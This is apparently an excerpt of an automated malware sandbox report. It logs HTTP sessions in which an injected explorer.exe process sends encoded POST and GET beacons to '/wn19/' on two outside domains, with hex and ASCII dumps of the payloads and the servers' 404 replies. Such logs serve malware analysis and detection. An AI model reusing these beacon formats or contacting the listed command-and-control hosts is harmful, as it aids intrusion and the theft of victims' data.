3OpmRZXhgAQlhcu5OItdevOpWGRpyHWYq6dqur~LAE9NKZ7RP9xlk-Ejt-zjUsMeioyh98KmlJiwzQmiHSvRL2oqUab2(M0daZpXrlHnR0r7Z3ad(nZVTybI~9K1w6FlL3SwLWgU(-4nrnSyNFojqaOJ49456e~R5xPjYPcaymN3BRMXjzIB5g9eTWFjVh3AXb93QKNUdJfZ7bDDVRiakaMYEI18kGx9gxFUFxk7y4DvWCx0noboNoifGnha8dGwQPZCHQWJn5QxFzet35VOfsY6~rSnuAzRSC~MVxnUyeIQ1GbiHGM056Db(w0L8gfmK-QsLpvPVCwiy4W8m6(Q(m0o2CjqafOIazoMDo1r(6hNW2N1ung97rdUPDUQUjfJF-eg37Mw2_TtXsEHYgYiucHayUM7bkb9pIUNycyTtA56E1AYR2iJhvptBrR-etc5LuVm17Hm16Dv99EKkvyVBlcICn8Npxrw95vSCGvVhCaCmNQ68FTYrLeEII6UQdCpDZpJSahwwUmvexwbO1X9w4slB-M2RSYZMpFz(mpREDfqulo8qxWd9S2wmAZ4D1kiOwe7fUfMiAcrnYIobzy4cl9n8aW5WZZDHi5lcvBt4bK_3_B14eAUgOi9mH0YTBQ5~AO1W_Zm5XNqU9DYYVkkmfUFKyg4pjJpC5nEBWdnSqWAO00usJzCsQtUbZj_zmvOSsYEa2RBHiYUqB~KMmlCBuGiySAdcC3SyusmQClt~BNwuOrxg9LOYBaJHLvzZrSliQkpOBO_YRqWeXw9QoKByM(Xp1eL3xWGjNBWKSuvGt2X39xv9l3oSrZJPcLFffYwybACY43aen90wpn7oKMqIhmVr2~qO7ppRm7tPRWsGnBA0SygIQZgWKr863inA03IaGIXHao1rxFjRkAbhzymfhKNs836(RQYUoD1all0pkDlL4GcaBME4DyVYHkYJtJiQzJ00G8JBWsvbynSsY~fe6JgKMUI28H2PJ88vFAbvj5m5gNSQDr5VK~eLokBGkCOvGs8BhDyT30P9wz8IO9sNnLnc64Nz0gKy1yaNQUWzIpj5j1FlvgQ2Dt3drp2LTZgIxeM3JSI69L28ieQTuWJIlA8tcYjtDoOqXIoGvJ4Fxl6jwZ_jb0ou36g61sndoy35OOIV5dunp4EVy5bCWnrZnQPqUFi1VmmNbJkOdscrz8M~mRWPHi6NbEiJHnBtsn5v7TAUcBekAcUMAAZoZ9xa-tsUOg5RroqXisNBmid1K~3h1uaNeZmonA_1sjdC-FqflKByIVCy-(MgE2xHQg9F3Onx9aJwfQpfR4XYoe3yqjzfdrev_TvVRfg5Db1kcTR6saKE1sbzMxpKaUq0naZrL5_Hbk76xJ-UU~PNl8hpXa4zqzwF_TY(mSpoANOtVm3q0t


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  2192.168.11.2049769217.160.0.1880C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  May 10, 2022 14:25:23.516134024 CEST9373OUTPOST /wn19/ HTTP/1.1
                                                                                                  Host: www.borneadomicile.com
                                                                                                  Connection: close
                                                                                                  Content-Length: 227520
                                                                                                  Cache-Control: no-cache
                                                                                                  Origin: http://www.borneadomicile.com
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept: */*
                                                                                                  Referer: http://www.borneadomicile.com/wn19/
                                                                                                  Accept-Language: en-US
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Data Raw: 41 56 6e 58 41 68 3d 49 66 68 31 75 65 64 70 75 42 49 76 6b 78 69 55 6a 64 76 6e 64 73 4d 4f 6c 2d 73 4d 67 66 76 47 38 6b 59 32 38 70 55 4d 47 51 65 6c 77 70 62 2d 33 4e 56 33 39 30 62 51 32 76 61 42 70 33 4b 53 4f 4b 6d 56 68 4c 53 37 39 45 57 74 48 79 63 32 4a 67 32 6c 59 58 6b 38 4a 69 6f 53 54 79 6d 6a 35 6b 54 36 30 54 65 74 77 72 50 47 59 76 71 4c 31 77 32 66 61 53 55 6e 6d 39 68 50 5a 4d 37 56 43 50 51 51 79 78 34 30 7a 6f 65 43 76 67 65 65 49 6d 48 45 52 6f 62 6c 45 4c 43 66 32 4e 6d 61 46 2d 44 73 43 63 65 67 4f 46 44 4f 4a 71 38 5f 46 4e 34 4b 4b 36 28 48 4d 7a 63 6c 47 65 42 37 35 32 41 7a 37 73 62 37 32 2d 45 65 4d 55 46 33 28 7a 44 6d 78 56 57 43 76 45 68 5a 62 32 35 44 42 32 67 63 72 5a 58 4b 52 77 6e 75 52 44 68 64 63 68 48 48 6e 4e 6c 67 78 56 28 50 46 34 51 63 51 50 55 30 47 67 37 47 69 39 4e 45 66 77 50 39 75 79 76 31 4f 55 63 55 30 48 6f 65 34 69 4f 72 63 42 46 39 4b 47 53 34 4f 4b 59 55 44 61 5a 79 32 73 7e 4f 75 39 4c 51 6f 59 58 33 75 49 6d 37 46 52 52 74 78 58 4a 69 49 62 49 66 62 6f 71 32 5a 58 45 37 54 65 46 65 75 5a 4f 6d 33 6e 39 36 6e 6f 69 38 4b 57 5a 69 47 59 64 4a 64 59 54 57 52 31 75 79 44 50 78 55 46 31 52 64 4b 77 4f 68 6c 54 32 2d 59 53 34 33 56 38 79 7a 6b 55 41 34 39 74 37 49 4b 73 32 59 68 39 66 66 62 64 7a 57 4c 36 48 51 52 71 74 4a 71 51 41 41 30 2d 57 39 52 62 43 68 4f 36 4f 38 6c 4a 72 46 6f 69 72 43 71 68 7a 5a 7e 7a 70 76 56 44 62 52 4b 42 7a 57 73 30 51 67 6b 71 48 69 38 4e 69 35 71 66 6b 35 52 62 4e 77 30 31 73 42 33 55 45 64 62 31 38 41 32 2d 51 6f 4a 42 68 5f 6f 35 52 6e 44 41 59 73 77 75 77 57 39 31 50 63 38 55 6a 53 36 78 4e 4b 34 43 4c 45 6e 68 30 6a 42 34 62 6e 41 4a 32 4b 7e 6c 6f 49 69 70 4e 59 35 6e 72 78 57 74 55 45 79 66 46 2d 71 37 32 65 50 75 66 39 35 48 34 51 7e 47 45 37 66 4b 78 76 42 78 4c 44 52 45 77 41 62 5f 69 2d 7e 62 37 30 38 57 6a 78 5a 2d 78 4a 59 6b 33 44 48 64 38 49 4a 67 6a 42 4d 4f 35 49 56 37 4c 48 79 37 4c 34 30 4a 67 42 50 7a 34 4f 53 43 77 33 58 73 66 73 56 75 58 67 50 4a 43 2d 69 76 30 31 63 68 62 34 54 62 77 58 49 59 6b 5f 6e 67 34 38 69 65 73 41 39 58 57 78 76 36 6e 58 70 30 62 45 32 59 4f 72 7a 58 62 56 56 77 66 59 6a 68 45 6d 33 54 6b 77 4f 66 31 45 72 79 56 38 7e 4b 54 44 5a 79 42 6c 6a 43 66 65 77 5a 50 4a 35 5a 34 65 39 6c 78 42 75 43 48 61 62 55 56 33 56 74 65 4c 76 64 55 61 63 47 41 4c 42 39 63 63 75 46 63 2d 63 5a 74 69 6a 79 4b 61 66 49 31 73 4b 39 30 71 69 78 75 46 5a 69 74 5f 33 53 55 4f 6b 4f 77 38 30 42 71 30 61 49 72 58 77 4e 75 4a 34 56 56 2d 37 4f 47 51 7a 30 4c 35 50 71 39 4d 47 6e 4f 69 58 49 61 75 56 4a 67 36 79 32 46 33 49 4f 77 41 41 35 67 63 6d 4e 4d 33 5a 48 73 74 76 67 6e 61 33 4b 51 37 57 61 42 30 65 57 69 6f 66 59 38 74 50 38 62 50 46 76 64 7a 38 6f 45 37 4e 45 4c 4f 59 44 66 32 53 4e 59 44 47 34 7e 4e 54 68 4e 69 4a 67 4a 35 55 47 46 34 72 76 7e 51 68 61 50 48 51 49 6e 55 4c 33 56 73 45 52 58 6c 48 4a 35 41 37 54 6d 6c 59 38 74 2d 43 48 39 48 37 32 43 2d 50 35 33 73 43 70 37 78 47 39 45 45 79 74 79 30 30 53 43 66 73 46 62 7a 41 44 33 59 64 63 4b 7a 45 2d 42 32 4c 52 6f 67 75 66 53 38 48 6e 33 76 67 35 5a 67 6c 59 4d 64 6f 5f 79 71 30 33 61 6f 5a 77 32 4b 39 41 52 4f 38 63 55 55 6e 42 77 7a 68 4c 6e 51 47 64 72 75 51 53 49 6e 6c 76 58 59 63 52 45 6a 4e 69 33 47 63 33 71 71 70 70 64 74 74 69 74 66 34 71 7a 76 66 72 50 53 74 52 51 58 4a 62 78 47 41 54 79 51 54 63 61 6f 55 54 55 42 7a 55 62 31 37 74 31 6a 73 69 51 72 66 37 53 54 6b 4e 28 6d 4f 4d 6c 4c 36 65 28 4d 79 67 48 78 5a 46 45 72 47 44 71 43 5a 54 54 61 35 38 57 30 30 4c 42 71 57 34 31 6c 31 47 76 38 47 76 41 76 77 45 79 7a 45 7a 4b 77 73 72 64 37 6c 6c 55 59 63 5a 42 41 6c 73 50 71 62 34 6a 6e 32 48 74 65 55 51 74 48 69 51 46 50 79 78 57 50 45 4e 6e 6c 30 59 47 73 47 78 48 79 69 79 54 64 6a 34 4d 7a 6c 35 38 45 46 77 79 51 5a 4b 4c 6d 58 45 50 6f 53 31 51 6b 4e 37 4d 65 58 44 34 52 6f 4c 6a 70 49 5a 57 68 62 7a 59 47 4e 44 33 2d 6d 7a 49 6a 31 35 53 5a 6b 48 56 4f 41 32 28 33 42 37 31 30 53 59 5a 47 4c 44 71 58 69 74 43 6f 32 4d 67 50 41 45 6e 68 67 61 62 55 50 67 48 77 63 4c 4e 48 32 69 61 75 48 47 6b 43 75 69 47 72 4d 6e 65 44 39 32 74 6f 51 47 73 61
                                                                                                  Data Ascii: AVnXAh=Ifh1uedpuBIvkxiUjdvndsMOl-sMgfvG8kY28pUMGQelwpb-3NV390bQ2vaBp3KSOKmVhLS79EWtHyc2Jg2lYXk8JioSTymj5kT60TetwrPGYvqL1w2faSUnm9hPZM7VCPQQyx40zoeCvgeeImHERoblELCf2NmaF-DsCcegOFDOJq8_FN4KK6(HMzclGeB752Az7sb72-EeMUF3(zDmxVWCvEhZb25DB2gcrZXKRwnuRDhdchHHnNlgxV(PF4QcQPU0Gg7Gi9NEfwP9uyv1OUcU0Hoe4iOrcBF9KGS4OKYUDaZy2s~Ou9LQoYX3uIm7FRRtxXJiIbIfboq2ZXE7TeFeuZOm3n96noi8KWZiGYdJdYTWR1uyDPxUF1RdKwOhlT2-YS43V8yzkUA49t7IKs2Yh9ffbdzWL6HQRqtJqQAA0-W9RbChO6O8lJrFoirCqhzZ~zpvVDbRKBzWs0QgkqHi8Ni5qfk5RbNw01sB3UEdb18A2-QoJBh_o5RnDAYswuwW91Pc8UjS6xNK4CLEnh0jB4bnAJ2K~loIipNY5nrxWtUEyfF-q72ePuf95H4Q~GE7fKxvBxLDREwAb_i-~b708WjxZ-xJYk3DHd8IJgjBMO5IV7LHy7L40JgBPz4OSCw3XsfsVuXgPJC-iv01chb4TbwXIYk_ng48iesA9XWxv6nXp0bE2YOrzXbVVwfYjhEm3TkwOf1EryV8~KTDZyBljCfewZPJ5Z4e9lxBuCHabUV3VteLvdUacGALB9ccuFc-cZtijyKafI1sK90qixuFZit_3SUOkOw80Bq0aIrXwNuJ4VV-7OGQz0L5Pq9MGnOiXIauVJg6y2F3IOwAA5gcmNM3ZHstvgna3KQ7WaB0eWiofY8tP8bPFvdz8oE7NELOYDf2SNYDG4~NThNiJgJ5UGF4rv~QhaPHQInUL3VsERXlHJ5A7TmlY8t-CH9H72C-P53sCp7xG9EEyty00SCfsFbzAD3YdcKzE-B2LRogufS8Hn3vg5ZglYMdo_yq03aoZw2K9ARO8cUUnBwzhLnQGdruQSInlvXYcREjNi3Gc3qqppdttitf4qzvfrPStRQXJbxGATyQTcaoUTUBzUb17t1jsiQrf7STkN(mOMlL6e(MygHxZFErGDqCZTTa58W00LBqW41l1Gv8GvAvwEyzEzKwsrd7llUYcZBAlsPqb4jn2HteUQtHiQFPyxWPENnl0YGsGxHyiyTdj4Mzl58EFwyQZKLmXEPoS1QkN7MeXD4RoLjpIZWhbzYGND3-mzIj15SZkHVOA2(3B710SYZGLDqXitCo2MgPAEnhgabUPgHwcLNH2iauHGkCuiGrMneD92toQGsaqVooNA8bkH90ktPBXXluIIg6a_bG8sAyM4cuQ8p4MLRYJHvZtX1mFwz2SXG2ZAstVBtfhwrisgKKDvuDXY9i9n95Wj2fSTqNQ-19xFY0UocH1LaZ1wWbLqNLti7-pPQJIO9Z94gU9jOvpkTGh9VsYfMs6kGNdfZNzWRfP8FR2J76N1DE9ZSwwdpHMQfKhjQnBluMYejhAdhbF0(3VIuuM0~A1A7tYnR4LDnP5wXCrVkRhs~ehZ8XDGe6Ctyk5C~IpfZoDwcA3lbWkoX2jA2Mt1Rj3cKZ2SS2Qme4RUn_hqApsdEM3hfk0W(QthQ7dJd46gWKy17vz-Sos9f2J4j1JVbU~shzNmu1hpm4GCiYf6kwbCYdQbVvCSuC1h4fsASA9r2ctLfJg6MjFIkDMqUc2nMZxq9fatxpRsR6m_rjv6m84whtdgKOmzZV64jgl4owWOqtKXvQzaIMgA56K3KY~iYRkgSIZqHbeP4q3ZlR22pFQLRST0eLuiZqtvwKliKLEgKYR4uVJLsbUW3mgjD7MbBIXjJL9Rrf3RxR7R0dycqJRI9A5JCv2O4mxt6Jb98hh825tC4PoVFd(ceEcF~CT8w_jUcgzsxGvyTFCh60lEv0KIHjVDcY3mwW0xXXu_FpM0dzTZaxayyQrhmyr1EoOaElRqT0PWrYAjq26AO93r9gR5kJg2as9YseHao2ZBEL(4I7YblxTYybTnQ5WmiRRCIkgp7VnxDCkEorGKhYF4JAAm8-DdnigaHgBKiZ27Gw5idUWRRdZ-dGcKqH(YMw4qLJyNQ8WdwjxmjOVYcQ8RgBOv(IKBM9HJzCi9HDrC(2O0QTB9GJi7dYo_ElRV7xKyOzNEYC4GBz5-8C5dArJt~Vk9k4zBSGshuY1FPCGnV6R4BcKLBDsvP1luY5B7GPUk~4yK(zDBwW4nEf73bOc1cs7-QLdrnICHgvaMfi0K(ZdLKxhc1X0ZbgoR86aINDii8XGhZlbF1KYd~V(CSfzO0MlzeFjm6_WqqoLeXISqqonjwMCg(loeBdPkCdWVX3ffRLY0xlmCNyXmfIgULf(nVEcVZSjLo1OipXawDnVpiWkhxL~wGdsksMqKBZscIMqlQYL186qSydZTftVt3zyfDOEhmYM6YljhpHYaPBv2do9ZH-(YOTp06yG35On_n3AXzwWcl6W12k0QtIb3R1zURkZidS0p5ONqEiJf5EErodk63mc4D-(qSud59K0HSv3ZCHdKTkVVcieQ2eS5MFHq2tRT31VPf79onm6d(oc9HC2xV_C08ut1o5wiRHsPFbcyyix5siuNPb4HzfLRck9WkzspW5JMXJnN9SOZ4R7hJoafcjfXKyRyzZjcnIXkPfxDpflv(GPYGoVikzWfo_n8p4a3iblAtifvyr~FQHMkmuchIyNPaRbLL-BKTDhZz6iGB5UODITXjnnD9VRXbyhOp_FgISqKFyuuqvIUWQsnPup7lpJAkviThuOBTe4yhCvkUIlI8pnNC0Gb~M41PPgLmDfopdDmlRXDEPfYtarCJ6Y3exrJhOkhmhzLX7PfOx6sruyi1z~laq2YeY4jv4flfITJknlJZh(qqkb17wIdxBn-uOJKdU6dX6NjqPNhc6JZNoe8swcAtKfuWkEL(NVTbWu-hEWXXCs1z_rPuP72W5bcLK7iBgRPXpxIZbgPAaVk1fIxDI7m38GAwIHaroo0R0tHULxXlz8aurco~oSjke9qVYji7YR-LmhLAgGw(y~rLF7ikiQ90Z23HzyHUMAswj6tk9RfyRuWQv6vmcC9mIJREst8c9q9N2fGsjxaCcZi3Zz4AFHCNz26YTizXRliBwejc3y3VBVrorbvtsCtCSKHITfeDIVYbiUXE8iYPW8gAfefzMNhybAZ(rvEWtpKWCjrb5FlY2EA9IM_5cC-PFz_pweu9sUUzUPKe1ASKe(XfqJRVgV0d7PF(6UsAMeBnXw2YKwtLhF4J5RdTjxUjfyivoZagRUTJ7OVDHFnTB~WWGx6mnWktdSdkl7FPRSeyx0TQsWJm5mTBmX6jGaE7zEty7HpWt7v(2TZgMzhIwSFpblUrlRpfB5tPidIECq2p1S4vT5EF4z3LtPmHJCqwSSSeIZfJSPAme1VSU8QFai1vGQwTBcnAvztftMU77Q_AToxrQNhhV01C91SMymg9ATe8wwRAsG6o3OwW5JJb-sqdkKgj1FsWKnUNw2_K9b0oTcVo_shMGOGrj987hFxrMv9z35WpYz72nlXZ9y2ut9Q1EFPiSDBKp7PJOZl9nnuOKBGm7CBf6s2mP4VOBil5mcAmRA4nYQqIQ0CU6tGH7nExO9aWSoCh69W3u0bUI14R1glaciOpQsecHAv(1SJcsRei7ukvOlPONEnspg94kS4fvb16M3ukiSLWw8jZ-J7kCNvfZF6mHJYzKZj7Te9zDSWXto5T3nC4l~ANbc_dsZyxB2pXyln2AodF6FQXMVrGWp7hRE_8WdIcP7UkfN3VhBvZEh2kndpefwqpbqBR6VLP8yZw567yoQILBhn2dplj-Fyy6KZ01nb3uCEGQ066E1swVeTsO97TCj7Trjb8AFn9MeRG1Saj3XGeD3v4R9MlGhpESkY~-vd7I(x5H3UnBQftfCzR8TACmn1jNRolFeI1e50d6N0AKfUdIb48gF9~JcF2LzGj9qyDJZ4MOlPIAT3G3fNHcQMMyqakfKuLOqiZ3gsUuD4zW~kD
                                                                                                  May 10, 2022 14:25:23.590347052 CEST9598INHTTP/1.1 404 Not Found
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Date: Tue, 10 May 2022 12:25:23 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Encoding: gzip
                                                                                                  Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  3192.168.11.2049770198.23.49.17380C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  May 10, 2022 14:26:24.113207102 CEST9600OUTGET /wn19/?AVnXAh=q67zoIOMf4+mO4D8EIqIf3d7IvOeBQOSx5x5Cm6B2nNhbRkYSectWIWbwYJ7UqoIixMy&Vb3pDf=BHT0MRp HTTP/1.1
                                                                                                  Host: www.clickleaser.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  May 10, 2022 14:26:24.624233007 CEST9602INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 10 May 2022 12:26:24 GMT
                                                                                                  Server: Apache
                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                  Link: <https://www.clickleaser.com/wp-json/>; rel="https://api.w.org/"
                                                                                                  Vary: User-Agent
                                                                                                  Connection: close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Data Raw: 31 66 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 63 64 6e 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 27 20 2f 3e 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 43 6c 69 63 6b 20 4c 65 61 73 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 61 70 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 69 63 6b 20 4c 65 61 73 65 72 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 43 6c 69 63 6b 20 4c 65 61 73 65 72 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 6c 65 61 73 65 72 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 33 2e 31 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70
                                                                                                  Data Ascii: 1f08<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel='dns-prefetch' href='//cdn.clickleaser.com' /><title>Page not found &#8211; Click Leaser</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//www.google.com' /><link rel='dns-prefetch' href='//maps.googleapis.com' /><link rel='dns-prefetch' href='//www.googletagmanager.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Click Leaser &raquo; Feed" href="https://www.clickleaser.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Click Leaser &raquo; Comments Feed" href="https://www.clickleaser.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"http


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  4192.168.11.2049771198.23.49.17380C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  May 10, 2022 14:26:26.762187958 CEST9620OUTPOST /wn19/ HTTP/1.1
                                                                                                  Host: www.clickleaser.com
                                                                                                  Connection: close
                                                                                                  Content-Length: 227520
                                                                                                  Cache-Control: no-cache
                                                                                                  Origin: http://www.clickleaser.com
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept: */*
                                                                                                  Referer: http://www.clickleaser.com/wn19/
                                                                                                  Accept-Language: en-US
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Data Raw: 41 56 6e 58 41 68 3d 69 59 33 4a 32 73 6a 38 66 34 79 55 64 66 50 79 4e 34 72 59 49 77 49 59 44 36 57 5f 4c 7a 4c 4d 6c 4d 78 35 57 58 7a 57 79 79 35 61 5a 79 63 5a 44 5f 4e 31 61 66 6a 45 6a 61 56 5a 63 4d 4d 39 39 7a 63 4a 6a 78 62 76 63 49 72 78 34 65 4d 69 49 58 45 61 78 74 4b 36 5a 34 68 2d 63 37 71 6c 63 41 43 4b 53 4f 36 52 31 4c 45 7a 46 66 50 54 6e 73 5a 6c 45 45 73 6e 45 4c 57 57 4f 66 31 58 7a 63 71 59 79 54 47 49 44 77 69 51 41 43 54 71 6c 31 76 6d 6e 55 4d 4a 53 69 66 56 69 4b 7e 6f 6d 68 49 38 7a 58 75 34 65 38 59 78 4c 69 54 66 5a 45 41 67 4b 6f 74 73 6c 47 50 32 46 30 75 33 35 44 56 4d 51 6c 69 61 41 30 54 73 28 72 48 71 72 54 7e 6c 34 77 72 6d 50 58 4a 63 65 33 48 32 51 6d 61 43 38 56 48 36 55 32 38 33 55 6a 49 6b 36 4a 46 4e 4a 5f 78 69 77 5a 6e 6d 58 30 5a 67 43 57 45 70 58 2d 54 6b 6f 77 56 57 71 4a 43 54 42 71 41 5a 67 68 56 37 65 45 30 4f 51 30 48 72 42 76 41 35 65 32 4d 49 6e 43 77 33 57 4c 4c 32 51 52 7a 4e 32 65 72 63 7a 37 36 65 67 7a 7a 79 76 73 4d 55 63 55 78 6b 7a 33 33 5f 64 6d 78 57 64 6f 34 7a 36 78 72 79 65 5f 61 65 50 69 51 54 79 63 47 43 56 59 56 55 61 66 7e 31 4a 72 42 67 67 